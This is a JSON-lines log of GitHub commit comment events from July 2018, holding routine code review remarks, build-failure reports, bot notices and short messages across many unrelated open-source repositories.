{"id":"7903714486","type":"CommitCommentEvent","actor":{"login":"thiemafe"},"repo":{"name":"transparency-lecture/transparency-lecture.github.io"},"payload":{"comment":{"id":29559565,"position":11,"line":11,"path":"2018-06-15-Results-AWS-data-Patscherkofel-version2","commit_id":"f18bdc1c2765f769ffddb7d1674303e5508df4b0","created_at":"2018-07-01T21:32:11Z","updated_at":"2018-07-01T21:32:11Z","author_association":"CONTRIBUTOR","body":"Maybe put a link to the used radiometers, it should be https://www.campbellsci.de/cnr4"}},"created_at":"2018-07-01T21:32:11Z"}
{"id":"7903715783","type":"CommitCommentEvent","actor":{"login":"Anaeligbo-Joseph"},"repo":{"name":"Anaeligbo-Joseph/ALC-challenge-Journal-App"},"payload":{"comment":{"id":29559570,"position":null,"line":null,"path":null,"commit_id":"5ab4d1c5ea9fc5bf5b787bd7e70de0a1ab989169","created_at":"2018-07-01T21:33:10Z","updated_at":"2018-07-01T21:33:10Z","author_association":"OWNER","body":"Journal app"}},"created_at":"2018-07-01T21:33:10Z"}
{"id":"7903715841","type":"CommitCommentEvent","actor":{"login":"JacobCallahan"},"repo":{"name":"JacobCallahan/robozilla"},"payload":{"comment":{"id":29559571,"position":37,"line":210,"path":"robozilla/decorators/__init__.py","commit_id":"97c348ef375008c614e26a64ca0dd62345b0fb4f","created_at":"2018-07-01T21:33:12Z","updated_at":"2018-07-01T21:33:12Z","author_association":"OWNER","body":"New version of this code handles Unspecified, GA, and Beta; aligning them to the highest downstream flag. Additionally, with no target milestone set, it will continue on as None to be handled in the following lines."}},"created_at":"2018-07-01T21:33:12Z"}
{"id":"7903716522","type":"CommitCommentEvent","actor":{"login":"dannye"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559574,"position":363,"line":3466,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:33:42Z","updated_at":"2018-07-01T21:33:42Z","author_association":"MEMBER","body":"Haha, without looking into it at all, my first guess was that $f8 was some kind of bias in the coin toss, but now I see it"}},"created_at":"2018-07-01T21:33:42Z"}
{"id":"7903716529","type":"CommitCommentEvent","actor":{"login":"junlong-gao"},"repo":{"name":"junlong-gao/recreations"},"payload":{"comment":{"id":29559575,"position":9,"line":9,"path":"code_practise/leetcode/861.cpp","commit_id":"f16e74102228fc918ac23d05a4e54dcfe5276890","created_at":"2018-07-01T21:33:43Z","updated_at":"2018-07-01T21:33:43Z","author_association":"OWNER","body":"because in the binary representation\r\n2^n > 2 ^(n-1) + 2^(n-2) ...\r\nso always greedy flip the most significant bit."}},"created_at":"2018-07-01T21:33:43Z"}
{"id":"7903719485","type":"CommitCommentEvent","actor":{"login":"dcnb"},"repo":{"name":"uidaholib/main-web-redesign_draft"},"payload":{"comment":{"id":29559576,"position":null,"line":null,"path":null,"commit_id":"0b2f1ac4d4bc4d70b5c697ba14bf240f51864c23","created_at":"2018-07-01T21:35:58Z","updated_at":"2018-07-01T21:35:58Z","author_association":"COLLABORATOR","body":"Whatever 😎\n\nOn Sun, Jul 1, 2018, 2:08 PM EvanWill <notifications@github.com> wrote:\n\n> i suppose not if you don't really want to access any of the other buttons\n> on the page and all...\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uidaholib/main-web-redesign_draft/commit/0b2f1ac4d4bc4d70b5c697ba14bf240f51864c23#commitcomment-29559497>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKbOGcfL26Ot5oWW-_iykV-GIMZ_vu1dks5uCTozgaJpZM4U-cmS>\n> .\n>\n"}},"created_at":"2018-07-01T21:35:58Z"}
{"id":"7903719792","type":"CommitCommentEvent","actor":{"login":"dannye"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559577,"position":743,"line":3904,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:36:12Z","updated_at":"2018-07-01T21:36:12Z","author_association":"MEMBER","body":"It was mostly that I didn't know the best way to name these and I didn't want to waste too much time thinking about it and going back and forth\r\nPlus, there's the four actions that I don't know the purpose of yet"}},"created_at":"2018-07-01T21:36:12Z"}
{"id":"7903720729","type":"CommitCommentEvent","actor":{"login":"JacobCallahan"},"repo":{"name":"JacobCallahan/robozilla"},"payload":{"comment":{"id":29559578,"position":60,"line":267,"path":"robozilla/decorators/__init__.py","commit_id":"97c348ef375008c614e26a64ca0dd62345b0fb4f","created_at":"2018-07-01T21:36:52Z","updated_at":"2018-07-01T21:36:52Z","author_association":"OWNER","body":"@rochacbruno this is where I think the current failures are coming from. The warn info I added above evaluates these to be:\r\n```skip_up: False, consider_flags: Unspecified, skip_down True```\r\nhere we see that it is correctly skipping the downstream check. However, since the consider_flags field is part of the check its 'Unspecified' value is not properly conveying that the bug should be skipped.\r\nAny ideas on how this should be better handled?"}},"created_at":"2018-07-01T21:36:52Z"}
{"id":"7903721628","type":"CommitCommentEvent","actor":{"login":"JacobCallahan"},"repo":{"name":"JacobCallahan/robozilla"},"payload":{"comment":{"id":29559583,"position":null,"line":null,"path":null,"commit_id":"97c348ef375008c614e26a64ca0dd62345b0fb4f","created_at":"2018-07-01T21:37:35Z","updated_at":"2018-07-01T21:37:35Z","author_association":"OWNER","body":"Note that all these extra warn logs will be removed in the final version."}},"created_at":"2018-07-01T21:37:35Z"}
{"id":"7903722139","type":"CommitCommentEvent","actor":{"login":"F43nd1r"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29559584,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-01T21:37:58Z","updated_at":"2018-07-01T21:37:58Z","author_association":"CONTRIBUTOR","body":"As seen in the readme, the current supported minSdkVersion is 14. \r\n![](https://img.shields.io/badge/dynamic/json.svg?label=Minimal%20Android%20Version&colorB=FF6F00&query=version&uri=https%3A%2F%2Ffaendir.com%2Fandroid%2Facra.php%3Fversion%3DandroidMinVersion)"}},"created_at":"2018-07-01T21:37:58Z"}
{"id":"7903723522","type":"CommitCommentEvent","actor":{"login":"Thomazella"},"repo":{"name":"diegohaz/singel"},"payload":{"comment":{"id":29559585,"position":null,"line":null,"path":null,"commit_id":"0ddf36e83012c11db21053d0e05a1df2a4e4aa65","created_at":"2018-07-01T21:39:03Z","updated_at":"2018-07-01T21:39:03Z","author_association":"COLLABORATOR","body":"I saw that on their docs. I think the default is stderr"}},"created_at":"2018-07-01T21:39:03Z"}
{"id":"7903725318","type":"CommitCommentEvent","actor":{"login":"papabass10"},"repo":{"name":"papabass10/start-here-guidelines"},"payload":{"comment":{"id":29559588,"position":null,"line":null,"path":null,"commit_id":"8a39a42ae3bd4cff845bd230c4bc4aa3b91fa3d5","created_at":"2018-07-01T21:40:22Z","updated_at":"2018-07-01T21:40:22Z","author_association":"OWNER","body":"added my name to the contributors list"}},"created_at":"2018-07-01T21:40:22Z"}
{"id":"7903726267","type":"CommitCommentEvent","actor":{"login":"mikehardy"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29559589,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-01T21:41:07Z","updated_at":"2018-07-01T21:41:07Z","author_association":"NONE","body":"Very interesting! I was getting compile errors indicating some language features used in 5.x required >= 24 and others required >=26. I'll re-examine that as your note indicates I must be doing something wrong. Thanks for replying"}},"created_at":"2018-07-01T21:41:07Z"}
{"id":"7903731197","type":"CommitCommentEvent","actor":{"login":"stevecotton"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29559595,"position":null,"line":null,"path":null,"commit_id":"34368fd99b36a27834a2a53672223e127a59cc44","created_at":"2018-07-01T21:44:56Z","updated_at":"2018-07-01T21:44:56Z","author_association":"CONTRIBUTOR","body":"This one's a build-breaker, because the wesnoth-nr/de.po is missing:\r\n\r\n    make[2]: *** No rule to make target '../../po/wesnoth-nr/de.po', needed by '../../translations/de/LC_MESSAGES/wesnoth-nr.mo'.  Stop.\r\n"}},"created_at":"2018-07-01T21:44:56Z"}
{"id":"7903734360","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-fs-feedstock"},"payload":{"comment":{"id":29559603,"position":null,"line":null,"path":null,"commit_id":"d284a0ae3fce8d8fb6f89136e3770667b2506e34","created_at":"2018-07-01T21:47:13Z","updated_at":"2018-07-01T21:47:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T21:47:13Z"}
{"id":"7903735309","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-tfdatasets-feedstock"},"payload":{"comment":{"id":29559604,"position":null,"line":null,"path":null,"commit_id":"ac3a41a26061d5d586e35aefe24eba75659999b4","created_at":"2018-07-01T21:47:56Z","updated_at":"2018-07-01T21:47:56Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @stevierene82 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T21:47:56Z"}
{"id":"7903736247","type":"CommitCommentEvent","actor":{"login":"edrotumax"},"repo":{"name":"EdwinTumax/html"},"payload":{"comment":{"id":29559607,"position":null,"line":null,"path":null,"commit_id":"634252cdc719c6c2b064c8c669576e1cab4d50f9","created_at":"2018-07-01T21:48:41Z","updated_at":"2018-07-01T21:48:41Z","author_association":"COLLABORATOR","body":"Estos cambios ya fueron revisados y aplicados."}},"created_at":"2018-07-01T21:48:41Z"}
{"id":"7903738409","type":"CommitCommentEvent","actor":{"login":"kapouer"},"repo":{"name":"GUI/lua-resty-auto-ssl"},"payload":{"comment":{"id":29559608,"position":null,"line":null,"path":null,"commit_id":"cee3eead1f2c7e27fe6f98f363f98e51857fb4a5","created_at":"2018-07-01T21:50:16Z","updated_at":"2018-07-01T21:50:16Z","author_association":"NONE","body":"I've just spent the day trying to figure what was wrong with my code... only to realize the `ssl_options` was not in latest release. Maybe it's time to release it ?"}},"created_at":"2018-07-01T21:50:16Z"}
{"id":"7903743114","type":"CommitCommentEvent","actor":{"login":"bigbes"},"repo":{"name":"tarantool/tarantool"},"payload":{"comment":{"id":29559611,"position":null,"line":null,"path":null,"commit_id":"ec1e0e76b816a2a36c529a071b256effb3ad797b","created_at":"2018-07-01T21:53:42Z","updated_at":"2018-07-01T21:53:42Z","author_association":"COLLABORATOR","body":"IMO:\r\n1) no need to do `ffi.C.setenv` - you can simply use `os.setenv`/`os.getenv`.\r\n2) creation of `under_tarantoolctl` and `is_restart` is overkill (not to mention that function names are.. bad)\r\n3) if (and only if) you want to create this functions - no need to create lua wrappers for them, use `ffi` for simple functions (they work faster)\r\n\r\nSumming up: this patch will be better written with only setting `TARANTOOLCTL` env.variable."}},"created_at":"2018-07-01T21:53:42Z"}
{"id":"7903743618","type":"CommitCommentEvent","actor":{"login":"sagiegurari"},"repo":{"name":"vtavernier/efiboot-rs"},"payload":{"comment":{"id":29559612,"position":null,"line":null,"path":null,"commit_id":"7ce6d591c1c5896d7ffba5c56d4fa696a19fea13","created_at":"2018-07-01T21:54:07Z","updated_at":"2018-07-01T21:54:07Z","author_association":"NONE","body":"good point. I'll think of something to make it easier to cache"}},"created_at":"2018-07-01T21:54:07Z"}
{"id":"7903747696","type":"CommitCommentEvent","actor":{"login":"MAJARS"},"repo":{"name":"EOtrade/smartcontracts"},"payload":{"comment":{"id":29559617,"position":null,"line":null,"path":null,"commit_id":"44b9661365c240f4a11f33c1da5149d438a7ff76","created_at":"2018-07-01T21:57:14Z","updated_at":"2018-07-01T21:57:14Z","author_association":"NONE","body":"44b9661"}},"created_at":"2018-07-01T21:57:14Z"}
{"id":"7903749590","type":"CommitCommentEvent","actor":{"login":"KFlash"},"repo":{"name":"cherow/cherow"},"payload":{"comment":{"id":29559620,"position":52,"line":50,"path":"packages/cherow/src/lexer/comments.ts","commit_id":"6a20499e38de02ae3993a983eff7c20af2b912e8","created_at":"2018-07-01T21:58:45Z","updated_at":"2018-07-01T21:58:45Z","author_association":"MEMBER","body":"@fkleuver Do you think it's worth it? Adding this filter? In any case. Could you test it on your computer?"}},"created_at":"2018-07-01T21:58:45Z"}
{"id":"7903750195","type":"CommitCommentEvent","actor":{"login":"DuncantheeDuncan"},"repo":{"name":"DuncantheeDuncan/Quize-App"},"payload":{"comment":{"id":29559622,"position":null,"line":null,"path":null,"commit_id":"e77627ccfd39b0a3279ec598ab72417ad526f3a6","created_at":"2018-07-01T21:59:06Z","updated_at":"2018-07-01T21:59:06Z","author_association":"OWNER","body":"This app get a name from a user and and calculate the scores "}},"created_at":"2018-07-01T21:59:06Z"}
{"id":"7903752201","type":"CommitCommentEvent","actor":{"login":"rolandf"},"repo":{"name":"Zulko/gizeh"},"payload":{"comment":{"id":29559631,"position":null,"line":null,"path":null,"commit_id":"b6140cb2b435c925e15b849336c8bdf12e78b89c","created_at":"2018-07-01T22:00:21Z","updated_at":"2018-07-01T22:00:21Z","author_association":"NONE","body":"Isn't a semicolon missing on line 444 ?\r\n"}},"created_at":"2018-07-01T22:00:21Z"}
{"id":"7903753908","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29559634,"position":68,"line":64,"path":"src/component/Modals/AddMealModal.js","commit_id":"2c1a2c95ac2e3a747c29130ee612eb0fc09da588","created_at":"2018-07-01T22:01:31Z","updated_at":"2018-07-01T22:01:31Z","author_association":"MEMBER","body":"add space between onBlur and name arrtibutes"}},"created_at":"2018-07-01T22:01:31Z"}
{"id":"7903758452","type":"CommitCommentEvent","actor":{"login":"Lauszus"},"repo":{"name":"UltimateHackingKeyboard/firmware"},"payload":{"comment":{"id":29559642,"position":25,"line":423,"path":"right/src/usb_report_updater.c","commit_id":"84f48ed055b07eebe648b0aaf0fd4e99f80ddb42","created_at":"2018-07-01T22:04:53Z","updated_at":"2018-07-01T22:04:53Z","author_association":"COLLABORATOR","body":"This will only break out of the first for-loop, but not the second. Since you are calling return later on you can just do that here instead of calling break."}},"created_at":"2018-07-01T22:04:53Z"}
{"id":"7903758555","type":"CommitCommentEvent","actor":{"login":"RainNapper"},"repo":{"name":"akbiggs/challonge-tools"},"payload":{"comment":{"id":29559643,"position":null,"line":null,"path":null,"commit_id":"d9ead55dd78bff0f49aee8b29a73c1e27e0b4a2f","created_at":"2018-07-01T22:04:57Z","updated_at":"2018-07-01T22:04:57Z","author_association":"NONE","body":"Is this considered PII?"}},"created_at":"2018-07-01T22:04:57Z"}
{"id":"7903760832","type":"CommitCommentEvent","actor":{"login":"sanchit94"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29559646,"position":68,"line":64,"path":"src/component/Modals/AddMealModal.js","commit_id":"2c1a2c95ac2e3a747c29130ee612eb0fc09da588","created_at":"2018-07-01T22:06:39Z","updated_at":"2018-07-01T22:06:39Z","author_association":"COLLABORATOR","body":"Done!"}},"created_at":"2018-07-01T22:06:39Z"}
{"id":"7903761970","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29559647,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-01T22:07:33Z","updated_at":"2018-07-01T22:07:33Z","author_association":"NONE","body":"@ronf This change makes the tests fail when they are run in a sandbox with restricted networking capabilities. Can we mock `getnameinfo` like in https://github.com/ronf/asyncssh/blob/2d37355f803dc10f018514fad49bb920f4365c43/tests/test_auth_keys.py#L72-L82?"}},"created_at":"2018-07-01T22:07:33Z"}
{"id":"7903762669","type":"CommitCommentEvent","actor":{"login":"RasmusFonseca"},"repo":{"name":"getcontacts/getcontacts"},"payload":{"comment":{"id":29559648,"position":null,"line":null,"path":null,"commit_id":"56b8cf277b7cbbe8e4dcc592b7ffc1ecb54cc326","created_at":"2018-07-01T22:08:05Z","updated_at":"2018-07-01T22:08:05Z","author_association":"COLLABORATOR","body":"Neat"}},"created_at":"2018-07-01T22:08:05Z"}
{"id":"7903765668","type":"CommitCommentEvent","actor":{"login":"Jerryseun"},"repo":{"name":"Jerryseun/pix-art-maker"},"payload":{"comment":{"id":29559657,"position":2,"line":2,"path":"README.md","commit_id":"2baf1b185e761f4c25758aa2d4324e643a3eaea2","created_at":"2018-07-01T22:10:16Z","updated_at":"2018-07-01T22:10:16Z","author_association":"OWNER","body":"https://jerryseun.github.io/pix-art-maker/"}},"created_at":"2018-07-01T22:10:16Z"}
{"id":"7903766082","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29559658,"position":null,"line":null,"path":null,"commit_id":"11be27a3cdf1b0fe2d1e2c7e33a605154fb59265","created_at":"2018-07-01T22:10:32Z","updated_at":"2018-07-01T22:10:32Z","author_association":"MEMBER","body":"@worldofpeace Thanks for notifying us. I'm trying to fix it in https://github.com/NixOS/nixpkgs/pull/42848 and made the author aware of it: https://github.com/ronf/asyncssh/commit/6a92930e00f3bbc67d9cdf66816917e64f2450e9#r29559647. Help is very welcome."}},"created_at":"2018-07-01T22:10:32Z"}
{"id":"7903766264","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29559662,"position":null,"line":null,"path":null,"commit_id":"1aaf986c5109008b417b946db30a8818f2a39e21","created_at":"2018-07-01T22:10:41Z","updated_at":"2018-07-01T22:10:41Z","author_association":"OWNER","body":"Also did some renaming, removed the `realloc` command, and updated the README"}},"created_at":"2018-07-01T22:10:41Z"}
{"id":"7903767416","type":"CommitCommentEvent","actor":{"login":"vaskenis"},"repo":{"name":"vaskenis/github-slideshow"},"payload":{"comment":{"id":29559664,"position":null,"line":null,"path":null,"commit_id":"b114e35f4d5a339e6bed6902a5758cfb3f99a94e","created_at":"2018-07-01T22:11:37Z","updated_at":"2018-07-01T22:11:37Z","author_association":"OWNER","body":"---\r\nlayout: slide\r\ntitle: \"Welcome to our second slide!\"\r\n---\r\nYour text\r\nUse the left arrow to go back!"}},"created_at":"2018-07-01T22:11:37Z"}
{"id":"7903771779","type":"CommitCommentEvent","actor":{"login":"worldofpeace"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29559673,"position":null,"line":null,"path":null,"commit_id":"11be27a3cdf1b0fe2d1e2c7e33a605154fb59265","created_at":"2018-07-01T22:14:46Z","updated_at":"2018-07-01T22:14:46Z","author_association":"CONTRIBUTOR","body":"@dotlambda I take responsibility for this package so help will be given. Thank you for notifying the author."}},"created_at":"2018-07-01T22:14:46Z"}
{"id":"7903775458","type":"CommitCommentEvent","actor":{"login":"taquecih"},"repo":{"name":"cliffrwong/quality_estimation"},"payload":{"comment":{"id":29559686,"position":null,"line":null,"path":null,"commit_id":"e2c65afa194f8d07fd3c9e2268de09a0e7016a5e","created_at":"2018-07-01T22:17:28Z","updated_at":"2018-07-01T22:17:28Z","author_association":"NONE","body":"Thanks for sharing useful codes.\r\nI would like to use the quality estimation for English-Japanese dataset, however, it seems not work with the use of current version of tensorflow.\r\nCould you kindly specify the version of tensorflow used in the repository?\r\nThanks again for your time."}},"created_at":"2018-07-01T22:17:28Z"}
{"id":"7903780036","type":"CommitCommentEvent","actor":{"login":"grooverdan"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29559702,"position":10,"line":23,"path":".travis.compiler.sh","commit_id":"8d45bc2e69674d5de9659b5ffa0c5c5275cd6c9d","created_at":"2018-07-01T22:21:04Z","updated_at":"2018-07-01T22:21:04Z","author_association":"CONTRIBUTOR","body":"I left the check out because we always have ccache on the linux travis. It does look a bit inconsistent with the check at the bottom though."}},"created_at":"2018-07-01T22:21:04Z"}
{"id":"7903789303","type":"CommitCommentEvent","actor":{"login":"sholafalana"},"repo":{"name":"sholafalana/JounalApp"},"payload":{"comment":{"id":29559726,"position":29,"line":29,"path":"README.md","commit_id":"651e65d955e938e89379325de6909429fd6a498d","created_at":"2018-07-01T22:28:29Z","updated_at":"2018-07-01T22:28:29Z","author_association":"OWNER","body":" The Application can be downloaded at [](https://github.com/sholafalana/JounalApp/blob/master/app-debug-1.apk)"}},"created_at":"2018-07-01T22:28:29Z"}
{"id":"7903791114","type":"CommitCommentEvent","actor":{"login":"sholafalana"},"repo":{"name":"sholafalana/JounalApp"},"payload":{"comment":{"id":29559730,"position":26,"line":26,"path":"README.md","commit_id":"651e65d955e938e89379325de6909429fd6a498d","created_at":"2018-07-01T22:29:57Z","updated_at":"2018-07-01T22:29:57Z","author_association":"OWNER","body":"The application can be downloaded at https://github.com/sholafalana/JounalApp/blob/master/app-debug-1.apk"}},"created_at":"2018-07-01T22:29:57Z"}
{"id":"7903793846","type":"CommitCommentEvent","actor":{"login":"sholafalana"},"repo":{"name":"sholafalana/JounalApp"},"payload":{"comment":{"id":29559737,"position":null,"line":null,"path":null,"commit_id":"651e65d955e938e89379325de6909429fd6a498d","created_at":"2018-07-01T22:31:54Z","updated_at":"2018-07-01T22:31:54Z","author_association":"OWNER","body":"The application can be downloaded at https://github.com/sholafalana/JounalApp/blob/master/app-debug-1.apk"}},"created_at":"2018-07-01T22:31:54Z"}
{"id":"7903794055","type":"CommitCommentEvent","actor":{"login":"test3test3"},"repo":{"name":"antlr/grammars-v4"},"payload":{"comment":{"id":29559738,"position":15,"line":14,"path":".gitattributes","commit_id":"f08f5d22947ff8dc7231aa0dbce60a72debee665","created_at":"2018-07-01T22:32:04Z","updated_at":"2018-07-01T22:32:04Z","author_association":"NONE","body":"функция вычислениякодов"}},"created_at":"2018-07-01T22:32:04Z"}
{"id":"7903794801","type":"CommitCommentEvent","actor":{"login":"alesliehughes"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29559740,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T22:32:38Z","updated_at":"2018-07-01T22:32:38Z","author_association":"NONE","body":"avcodec.h can b found in /usr/include/libavcodec (debian)"}},"created_at":"2018-07-01T22:32:38Z"}
{"id":"7903794934","type":"CommitCommentEvent","actor":{"login":"TheQwertiest"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29559741,"position":null,"line":null,"path":null,"commit_id":"569f784ac87bae531eed258eab32383b9dc59d8b","created_at":"2018-07-01T22:32:44Z","updated_at":"2018-07-01T22:32:44Z","author_association":"OWNER","body":"Thanks!!! I've yet to start working on the hardest part though: the window object >_<\r\nPS: While I was implementing all this, I've come to realize how much time was sunk into this project by WSH panel devs and you - there are so many non-trivial features, which somehow all work together. And don't even get me started on that horrible undocumented fb2k API (there are literally no docs for the most of the API), that had to be used in some of those -_-"}},"created_at":"2018-07-01T22:32:44Z"}
{"id":"7903795571","type":"CommitCommentEvent","actor":{"login":"m-tmatma"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29559746,"position":87,"line":87,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-01T22:33:15Z","updated_at":"2018-07-01T22:33:15Z","author_association":"MEMBER","body":"ヘッダの中で using するのはよろしくないと思います。"}},"created_at":"2018-07-01T22:33:15Z"}
{"id":"7903798414","type":"CommitCommentEvent","actor":{"login":"callidex"},"repo":{"name":"callidex/LightningServer"},"payload":{"comment":{"id":29559754,"position":14,"line":38,"path":"core/lightningfrontend/Models/Datapackets.cs","commit_id":"5def8448bef2607eefb61889ceb80adf0e3b4dd8","created_at":"2018-07-01T22:35:36Z","updated_at":"2018-07-01T22:35:36Z","author_association":"OWNER","body":"quicker way?\r\n"}},"created_at":"2018-07-01T22:35:36Z"}
{"id":"7903798659","type":"CommitCommentEvent","actor":{"login":"kevinjwalters"},"repo":{"name":"kevinjwalters/CircuitPython_Bearable"},"payload":{"comment":{"id":29559756,"position":null,"line":null,"path":null,"commit_id":"764d308e099d34fe34eed8dfb986f399523b53ab","created_at":"2018-07-01T22:35:49Z","updated_at":"2018-07-01T22:35:49Z","author_association":"OWNER","body":"Unsuccessful speeling of success :(\r\n"}},"created_at":"2018-07-01T22:35:49Z"}
{"id":"7903799296","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29559757,"position":null,"line":null,"path":null,"commit_id":"0bb962ff89ad19bbb906edc377e6ed8e7f495086","created_at":"2018-07-01T22:36:22Z","updated_at":"2018-07-01T22:36:22Z","author_association":"OWNER","body":"Surprisingly not that hard to fix. I don't know why I wrote it that way to begin with. Lack of experience at the time, I suppose.\r\n\r\nAlso fixed a humorous typo."}},"created_at":"2018-07-01T22:36:22Z"}
{"id":"7903799678","type":"CommitCommentEvent","actor":{"login":"sholafalana"},"repo":{"name":"sholafalana/JounalApp"},"payload":{"comment":{"id":29559758,"position":26,"line":26,"path":"README.md","commit_id":"651e65d955e938e89379325de6909429fd6a498d","created_at":"2018-07-01T22:36:41Z","updated_at":"2018-07-01T22:36:41Z","author_association":"OWNER","body":"The application can be downloaded at https://github.com/sholafalana/JounalApp/blob/master/app-debug-1.apk"}},"created_at":"2018-07-01T22:36:41Z"}
{"id":"7903807096","type":"CommitCommentEvent","actor":{"login":"shahrozahmed1"},"repo":{"name":"kalperen/CamdenPlatform"},"payload":{"comment":{"id":29559767,"position":2,"line":35,"path":"ImageRecognition/classification/data_processing.py","commit_id":"3f951d6571a9221b29d1801201076f94a04eb4eb","created_at":"2018-07-01T22:42:45Z","updated_at":"2018-07-01T22:42:45Z","author_association":"COLLABORATOR","body":"Nice work, looks like positive changes here, but just make sure that any changes made to `data_processing.py` are tested before its pushed to the master repo .. if the unitest fails then fails, then please update the unittest accordingly"}},"created_at":"2018-07-01T22:42:45Z"}
{"id":"7903808067","type":"CommitCommentEvent","actor":{"login":"ClockVapor"},"repo":{"name":"seik/kotlin-telegram-bot"},"payload":{"comment":{"id":29559769,"position":null,"line":null,"path":null,"commit_id":"159b274759cb9df4ba4d746c677d3a0a22827912","created_at":"2018-07-01T22:43:33Z","updated_at":"2018-07-01T22:43:33Z","author_association":"NONE","body":"Thanks for the changes, @seik! `User.first_name` always has a value in the received JSON, though. https://core.telegram.org/bots/api#user"}},"created_at":"2018-07-01T22:43:33Z"}
{"id":"7903810230","type":"CommitCommentEvent","actor":{"login":"Snakedark"},"repo":{"name":"Snakedark/Numeric_Integral_Simpson"},"payload":{"comment":{"id":29559772,"position":null,"line":null,"path":null,"commit_id":"b04fecb18947e9f7c29d28154514fca74e3b2443","created_at":"2018-07-01T22:45:11Z","updated_at":"2018-07-01T22:45:11Z","author_association":"OWNER","body":"Python code for the Simpson Method."}},"created_at":"2018-07-01T22:45:11Z"}
{"id":"7903814310","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29559779,"position":null,"line":null,"path":null,"commit_id":"505ed39a2dcac1e18cb73e8b07044252828e3bcc","created_at":"2018-07-01T22:48:17Z","updated_at":"2018-07-01T22:48:17Z","author_association":"NONE","body":"On Sun, Jul 1, 2018, 18:03 Thorsten Otto <notifications@github.com> wrote:\n\n> On Sonntag, 1. Juli 2018 17:54:40 CEST Keli Hlodversson wrote:\n> > This will fail once we enable mmu support, as the bss is zeroed after the\n> > mmu is set up.\n>\n> Oops.\n>\n> >Also since we are running from ram, we don't need to avoid the data\n> segment\n> >on rpi as we do on the st\n>\n> Hm, i would still prefer to keep it like that, otherwise you have to\n> ignore\n> the warning from the makefile, and then you don't notice things anymore\n> where\n> variables should really be const. Maybe you can use a separate linker\n> section\n> for the mmu table?\n>\n\nI'd rather fix it so one can use the data segment normally on both\nplatforms... I had a patch for that a while ago ;)\n\n>\n>\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/th-otto/pTOS/commit/505ed39a2dcac1e18cb73e8b07044252828e3bcc#commitcomment-29558537>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADT4sduOf3YjTDH9xjE-8n7aPqjHQsuDks5uCPLSgaJpZM4U-X27>\n> .\n>\n"}},"created_at":"2018-07-01T22:48:17Z"}
